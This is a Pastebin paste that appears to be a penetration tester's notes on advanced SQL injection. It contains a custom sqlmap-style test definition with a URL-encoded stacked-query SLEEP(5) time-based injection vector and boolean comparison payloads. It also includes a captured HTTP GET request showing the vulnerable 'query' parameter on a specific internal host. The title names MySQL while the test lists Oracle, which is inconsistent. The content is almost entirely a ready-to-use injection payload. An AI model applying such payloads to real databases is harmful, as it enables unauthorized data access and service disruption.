Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Advanced SQL Injection- MySQL > 5.0.11 stacked queries (SELECT - comment)
- <test>
- <title>CUSTOM1</title>
- <stype>1</stype>
- <level>1</level>
- <risk>1</risk>
- <clause>0</clause>
- <where>3</where>
- <vector>query%29%3B%28SELECT+*+FROM+%28SELECT%28SLEEP%285%29%29%29bRCx%29%23</vector>
- <request>
- <payload>AND [RANDNUM]=[RANDNUM]</payload>
- </request>
- <response>
- <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
- </response>
- <details>
- <dbms>Oracle</dbms>
- </details>
- </test>
- GET http://test-agspr-as/Atti/zkau/web/_zv2014110516/js/zul.lang.wpd?query=query HTTP/1.1
- User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
- DNT: 1
- Connection: keep-alive
- Cookie: COOKIES
- Upgrade-Insecure-Requests: 1
- Host: test-agspr-as
Add Comment
Please, Sign In to add comment